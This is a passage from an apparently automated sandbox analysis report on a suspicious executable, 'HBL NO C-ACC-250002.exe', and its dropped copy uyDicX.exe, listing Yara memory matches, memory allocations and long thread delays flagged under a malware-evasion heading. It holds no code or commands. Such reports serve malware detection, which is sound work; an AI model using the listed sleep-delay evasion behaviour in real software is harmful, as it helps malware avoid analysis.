                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTR
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeMemory allocated: 1340000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeMemory allocated: 2C60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeMemory allocated: 7930000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeMemory allocated: 8930000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeMemory allocated: 8AD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeMemory allocated: 9AD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeMemory allocated: E40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeMemory allocated: 28E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMemory allocated: 2CB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMemory allocated: 7220000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMemory allocated: 8220000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMemory allocated: 83B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMemory allocated: 93B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMemory allocated: 2B00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMemory allocated: 2D40000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMemory allocated: 2B90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595100Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599891
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599781
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599672
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599562
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599453
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599343
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599234
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599124
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599015
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598906
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598797
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598687
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598578
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598469
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598359
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598250
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598140
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598030
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597922
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597808
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597703
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597573
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597469
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597359
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597250
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597141
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597031
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596922
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596808
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596703
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596583
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596453
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596343
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596234
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596125
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596015
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595906
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595780
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595672
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595562
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595453
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595344
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595219
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595109
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595000
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 594890
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 594781
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 594671
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 594562
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7163Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 715Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8055Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 888Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeWindow / User API: threadDelayed 2036Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeWindow / User API: threadDelayed 7786Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeWindow / User API: threadDelayed 2371
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeWindow / User API: threadDelayed 7489
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 2296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3556Thread sleep count: 7163 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3556Thread sleep count: 715 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6508Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 5268Thread sleep count: 2036 > 30Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 5268Thread sleep count: 7786 > 30Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -599766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -599641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -599531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -599422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -599312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -599203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -599094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -598985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -598860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -598735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -598610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -598485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -598360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -598235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -598110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -597985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -597860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -597735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -597610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -597485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -597360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -597235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -597110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -596985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -596860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -596735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -596610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -596485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -596360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -596235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -596110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -595985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -595860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -595735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -595610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -595485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -595360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -595235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -595100s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -594985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -594860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -594735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -594610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -594485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -594360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -594235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -594110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe TID: 1308Thread sleep time: -593985s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 7060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -25825441703193356s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 4460Thread sleep count: 2371 > 30
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -599891s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -599781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 4460Thread sleep count: 7489 > 30
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -599672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -599562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -599453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -599343s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -599234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -599124s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -599015s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -598906s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -598797s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -598687s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -598578s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -598469s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -598359s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -598250s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -598140s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -598030s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -597922s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -597808s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -597703s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -597573s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -597469s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -597359s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -597250s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -597141s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -597031s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -596922s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -596808s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -596703s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -596583s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -596453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -596343s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -596234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -596125s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -596015s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -595906s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -595780s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -595672s >= -30000s
